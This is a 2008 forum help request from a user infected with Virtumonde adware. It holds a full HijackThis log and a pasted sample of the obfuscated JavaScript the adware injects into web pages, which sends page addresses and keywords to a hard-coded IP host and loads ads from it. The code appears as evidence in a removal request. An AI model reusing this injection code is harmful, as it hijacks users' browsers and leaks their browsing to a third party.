Jump to content


Photo

Adware.Virtumonde Screwing up my computer


  • This topic is locked This topic is locked
20 replies to this topic

#1 a_fahmy7

a_fahmy7

    Advanced Member

  • Full Member
  • PipPipPip
  • 109 posts

Posted 13 June 2008 - 03:59 PM

Hello

yesterday, my computer get infected while downloading a rar file . I got immediate warning by NOD32 about the file and I chose "terminate process" immediately then deleted the downloaded rar file. However, the adware managed to install itself anyway. Since then I get occasional alert from NOD32 about the file bla bla is infected with it.

The first sign ,however, that something was wrong is that the windows auto-update feature got disabled, though it was always On , the default. Now whenever I restart the windows or computer, I get the alert that the auto-update feature is Off and each time I have to turn it On again.

The worst symptom came today is that browsing the internet changed. Some sites do not load at all like yahoo and some load slowly and the adware forces its Own code into the web page using javascript making the ads appear on the site pages. Heck, even a flashing ad appears on the spywareinfo home page ..,for me only of course.

Even spywareinfo.com doesn't load. I managed to open this window as well as browse the internet only through Proxy which I am using now while writing this post.

-System restore displays only one check point created yesterday after the time of infection immediately probably. So did the adware do this? Where are all the check points I used to have on June and May as well?!!?



-NOD32 detected these and supposedly deleted them in the last scan -yet the problem is still there-:

" C:\Documents and Settings\Ahmed Fahmy\Local Settings\Temporary Internet Files\Content.IE5\X8E5VJRZ\css4[1] - Win32/Adware.Virtumonde application - deleted


C:\System Volume Information\_restore{129201FA-B0AC-49B3-96B2-DEB8B91E727B}\RP458\A0092076.dll - Win32/Adware.Virtumonde application - deleted"

-The outcome of hijackthis:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 9:45:54 PM, on 6/13/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Sygate\SPF\smc.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\WLTRAY.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\WINDOWS\VMSnap3.EXE
C:\WINDOWS\Domino.EXE
C:\WINDOWS\system32\Rundll32.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Digital Line Detect\DLG.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Mozilla Firefox2\firefox.exe
C:\Program Files\Eset\nod32.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Documents and Settings\Ahmed Fahmy\My Documents\My Downloads\HiJackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=6061214
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.c...rch/search.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://us.rd.yahoo.c...//www.yahoo.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://jobreeze.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://us.rd.yahoo.c...//www.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.c...rch/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://us.rd.yahoo.c...//www.yahoo.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=6061214
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://us.rd.yahoo.c...//www.yahoo.com
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {129FA2A1-408C-4824-83A4-5001581FD01E} - C:\WINDOWS\system32\iifcARIx.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: (no name) - {4817D522-BD26-47F3-9239-D83E82760BBC} - C:\WINDOWS\system32\qoMdabXo.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O2 - BHO: (no name) - {6C5546A5-BB26-471D-9043-854AFA0AB66D} - C:\WINDOWS\system32\ljJCSkjg.dll (file missing)
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MI1933~1\Office12\GRA8E1~1.DLL
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [Broadcom Wireless Manager UI] C:\WINDOWS\system32\WLTRAY.exe
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [VMSnap3] C:\WINDOWS\VMSnap3.EXE
O4 - HKLM\..\Run: [Domino] C:\WINDOWS\Domino.EXE
O4 - HKLM\..\Run: [BigDog303] C:\WINDOWS\VM303_STI.EXE VIMICRO USB PC Camera (ZC0301PLH)
O4 - HKLM\..\Run: [BMcfa4d225] Rundll32.exe "C:\WINDOWS\system32\gfvwynfe.dll",s
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: Yahoo! Widget Engine.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
O4 - Global Startup: Bluetooth.lnk = ?
O4 - Global Startup: Digital Line Detect.lnk = ?
O8 - Extra context menu item: Download Using &BitSpirit - C:\Program Files\BitSpirit\bsurl.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Send to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra button: PalTalk - {4EAFEF58-EEFA-4116-983D-03B49BCBFFFE} - C:\Program Files\Paltalk Messenger\Paltalk.exe (file missing)
O9 - Extra button: Bonjour - {7F9DB11C-E358-4ca6-A83D-ACC663939424} - C:\Program Files\Bonjour\ExplorerPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\Office12\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Documents and Settings\Ahmed Fahmy\Start Menu\Programs\IMVU\Run IMVU.lnk
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {20A60F0D-9AFA-4515-A0FD-83BD84642501} (Checkers Class) - http://messenger.zon...kr.cab56986.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} - http://download.mcaf...01/mcinsctl.cab
O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} (UnoCtrl Class) - http://messenger.zon...1/GAME_UNO1.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) - http://messenger.zon...ro.cab56649.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zon...nt.cab56907.cab
O16 - DPF: {DA758BB1-5F89-4465-975F-8D7179A4BCF3} (WheelofFortune Object) - http://messenger.zon...oF.cab57176.cab
O16 - DPF: {F5A7706B-B9C0-4C89-A715-7A0C6B05DD48} (Minesweeper Flags Class) - http://messenger.zon...er.cab56986.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{BF5CCFB5-6096-404D-B329-56E8F3847FA6}: NameServer = 62.117.40.111,62.117.40.112
O17 - HKLM\System\CCS\Services\Tcpip\..\{CA254E2C-5690-497E-9971-569C6268C2DB}: NameServer = 62.117.40.111,80.75.166.250
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MI1933~1\Office12\GR99D3~1.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O20 - Winlogon Notify: iifcARIx - C:\WINDOWS\SYSTEM32\iifcARIx.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: AOL Connectivity Service (AOL ACS) - America Online, Inc. - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: GoogleDesktopManager - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktopManager.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: mental ray 3.5 Satellite (32-bit) (mi-raysat_3dsmax9_32) - Unknown owner - C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
O23 - Service: MySQL - Unknown owner - C:\Program.exe (file missing)
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Sygate Personal Firewall Pro (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\SPF\smc.exe
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: TuneUp WinStyler Theme Service (TUWinStylerThemeSvc) - TuneUp Software GmbH - C:\Program Files\TuneUp Utilities 2006\WinStylerThemeSvc.exe
O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe
O23 - Service: Dell Wireless WLAN Tray Service (wltrysvc) - Unknown owner - C:\WINDOWS\System32\WLTRYSVC.EXE

--
End of file - 13072 bytes


-The JS code that appears on webpages :

<script type="text/javascript" language="javascript">

var NSiMLeWsQpCLapBbww =22131 + 21122;
HxnlCrSmqQmcHEYJgrP = window.onload;
var mwXYIAVRkWuXjJy =32336;
window.
YsOdeVmPohFmACOqQ = 24087;

WJfOmfKONWHtrdsBR = "";

IwAcgVSPRioVLmf = "";
var fclkGxGNoHQhIQbg= 25868 - 6878;
VwPLuTcNsNemJejw = "";


mcyCYsfGWgSYfysplI = QvwYtAhTHqrqPYL(window.location.href);
var svLJhWsihMcSDJtGCLt =22525 + 21929;
SlCGyFQfaXOMnniLK = '154678';
var CYloeErmHYtFVCxtsd;
KJEjXIeLmLOmsngs = '08CE15D3C6514AFEAE39E6D3957E41CC';

oLphEwWGJxDDOUMUJe = '3660139C38E811DDB10B154678CFFFFF';
FtgTYOvIjOcWqqUXh =23729 + 10305;
dTQFgjaPsaeNorlH = 'mm2';




dlrxgvepbYPXtsQ = new Array();
var MCijQDnpyxAElrhV= 11948 - 11232;

KMuAUllXyybHTsoAhR = new Array();


var arrAnti = new Array("vlaze\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b728x90", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b728x90',
'http://85.12.43.83/f...8x90_9.html?a=b'
'728', '728', '90', '90',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b720x300", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b720x300',
'http://85.12.43.83/f...x300_1.html?a=b'
'720', '720', '300', '300',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b468x60", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b468x60',
'http://85.12.43.83/f...x60_15.html?a=b'
'468', '468', '60', '60',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b336x280", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b336x280',
'http://85.12.43.83/f...x280_1.html?a=b'
'336', '336', '280', '280',
'',
''));
var arrAnti = new Array("vlaze\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b300x250", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b300x250',
'http://85.12.43.83/f...x250_3.html?a=b'
'300', '300', '250', '250',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b300x100", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b300x100',
'http://85.12.43.83/f...x100_1.html?a=b'
'300', '300', '100', '100',
'',
''));
var arrAnti = new Array("googlesyndication\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b250x250", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b250x250',
'http://85.12.43.83/f...x250_1.html?a=b'
'250', '250', '250', '250',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b240x400", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b240x400',
'http://85.12.43.83/f...x400_1.html?a=b'
'240', '240', '400', '400',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b234x60", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b234x60',
'http://85.12.43.83/f...4x60_1.html?a=b'
'234', '234', '60', '60',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b180x150", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b180x150',
'http://85.12.43.83/f...x150_1.html?a=b'
'180', '180', '150', '150',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b160x600", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b160x600',
'http://85.12.43.83/f...x600_1.html?a=b'
'160', '160', '600', '600',
'',
''));
var arrAnti = new Array("search42\.com","joybuyjoy\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b125x125", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b125x125',
'http://85.12.43.83/f...x125_1.html?a=b'
'125', '125', '125', '125',
'',
''));
var arrAnti = new Array("tube\.com","youporn\.com","sexthe\.net","games\.yahoo\.com");var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b120x90", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b120x90',
'http://85.12.43.83/f...0x90_1.html?a=b'
'120', '120', '90', '90',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b120x600", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b120x600',
'http://85.12.43.83/f...x600_1.html?a=b'
'120', '120', '600', '600',
'',
''));
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b120x240", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};dlrxgvepbYPXtsQ.push(element);
KMuAUllXyybHTsoAhR.push(CreaterqQdIdnIvDDAfpyfect_24578457887(
'b120x240',
'http://85.12.43.83/f...x240_1.html?a=b'
'120', '120', '240', '240',
'',
''));



jKfuMEbehmSoDiaq = new Array();
VbcBoPFnvRiqwejyc =14907 + 21847;

cAmNPvvGDrXXVVYKbEF =3687 + 19013;
function hRFdedGVWUeIUmhVUk()
{
var CqgwKfSYcKXxEiMdoy= 31176 - 22385;
var wCgyCcPXTNCOCWxrTm;


window.
var QFwfClgsXtLmnDbas= 8413 - 5684;
if (HxnlCrSmqQmcHEYJgrP != null)
{
HxnlCrSmqQmcHEYJgrP();

}

var OVPcEdAybXkCiMVWRh;
if (!document || !document.body || !document.body.childNodes)
{
return;
var kEXVgtvCTuVohkrVhu= 875 - 22079;
}

if ( document.referrer && document.referrer.indexOf("85.12.43.83") >= 0)
return;

WJfOmfKONWHtrdsBR = sCFYiLEYpNtehya();
var MEvSjTqhmRYqFvIcJO= 4020 - 1840;
IwAcgVSPRioVLmf = HPXtBUDYOsDewuJS();
var HTRtHpBeoncDKDN= 7928 - 26912;
VwPLuTcNsNemJejw = FiuXbUKnHCDceCPUxb(document.body);
BDQHEaCDYwRajoWNtCj =24652 + 29963;

xuTVOuEkxlkDrigChjl();
RyERCYmxYuXdPVFbjma = 12989;
if(aSVAqBJVoqOwbmyck())
{

document.body.style.marginLeft = '0';

var XSUgvcbcULBhXniM =7404;
document.body.style.marginTop = '0';
var BQQcVlgealYPQlNE= 31700 - 10417;
return;
var GCADqJoMoycUcJPLb;
}

eyrjSsekVwfLMHwY = 13026;
wCgyCcPXTNCOCWxrTm = document.body.childNodes;

lHARjOOcARalwFdIBAG(KMuAUllXyybHTsoAhR, wCgyCcPXTNCOCWxrTm, 0);


}

function tkMlVUbqAcSlacRaDXf(millis)
{
GsipQUBcGAjDXXwPW =8260 + 18142;
var date = new Date();
gABItqByMLAdQdldkP = 4760;
var curDate = null;


do {
var LLIflyeUwyEwdDgvVbn =12052 + 29232;
curDate = new Date();

}
while(curDate-date < millis);
}

function sCFYiLEYpNtehya()
{
var WXVwjoYCGgWxrYvoKUq= 431 - 16654;
var temp = "";
var ORaMWDXLXjKkYOiAU= 3986 - 5617;
var e;
GclCyQrpCAfXORwUR = 14740;
try
{

temp = window.top.location.href;
var WUQPniHwrJSYrFTV= 13973 - 1099;
}
catch(e)
{

temp = window.location.href;
jWjfyauggTNkWoLIp =9455 + 18676;
}

return temp;
JNLYLuRppiTVLlBVn =28948 + 8961;

}


function QvwYtAhTHqrqPYL(str)
{
sTlCIfgOatYmeyp =24862 + 1717;
if (str == null)
{
var CYCrGHpSRrxkdlga= 28639 - 24244;
return "";
}

dvJYneOKKUhhVuEyIF =17500 + 29508;
str = escape(str);
var cSFHtkXBhICyHFG =10535 + 7135;
str = str.replace(/\+/g, "%2B");
vjmatTclgGCQYIpr =4479 + 1842;
str = str.replace(/\//g, "%2F");


return str;
YAPVyWhCSICEQnsrE = 22693;
}


function HPXtBUDYOsDewuJS()
{
var OSrIUhRcLXWoEsql =26641 + 32195;
var e;
EjMWJGtjdUmyuXWbiT =2912 + 25891;
var str = "";
qsgcdWaBpJHfFphTH = 26540;
try
{
var VhFCPEylbjsUacGrFQ =25244;
var head = window.top.document.getElementsByTagName('head').item(0);
var rpEMlSFVxMSqCIc= 21727 - 26614;
if(head != null)
{
var BtHUMsDueNmrwDaer= 9712 - 13866;
if (head.childNodes != null && head.childNodes.length > 0)
{
IVWLgYJomTjNXVVSNlP = 834;
for(var y=head.childNodes.length-1; y>=0; y--)
{
var child = head.childNodes.item(y);

if(child.tagName == "META")
{
var KrwdfneyJmqhUrj;
str += "<META ";
var HHQjsbOltDXGHhuxm =21229 + 11202;
if(child.content != "" && child.name == "keywords")
str += 'content="' + child.content + '" ';


str += " >\n";
var QLBDFWOhCBjOYKBBPh =15391;
}
}
}
}
}
catch(e)
{
giPUXpgJmoOYshcA = 12780;
}

UelVNCsDxweaOSXc = 19422;
str = QvwYtAhTHqrqPYL(str);

return str;

}


function fvfLgtJlubACmUbDJF(rulesetElement)
{

var i;
var gPqXUaoxhTiNBYACn= 16686 - 32012;


if (rulesetElement.Global == 1)
{
var VVenmtHnWRUDBaG;
return "_";
}

var CbtseCFwFrGhsYjb =13401 + 16423;

for (i = 0; i < rulesetElement.AntiArr.length; i++)
if (document.location.href.indexOf(rulesetElement.AntiArr[i]) != -1)
{
NvDNHaWebGuOlpwY =8184 + 31603;
return null;

}

var gaeHreOCbKtlGKFKJD= 32711 - 29392;

for (i = 0; i < rulesetElement.ContentArr.length; i++)
{
QOOETbhnnYRgdGTd = 184;
if (VwPLuTcNsNemJejw.indexOf(rulesetElement.ContentArr[i]) != -1)
return rulesetElement.ContentArr[i];
var BXOejyNlgmsUUysIsV =13647 + 232;
}

for (i = 0; i < rulesetElement.MetaArr.length; i++)
{
var GKnvTxbseOCxUhREJ;
if (IwAcgVSPRioVLmf.indexOf(rulesetElement.MetaArr[i]) != -1)
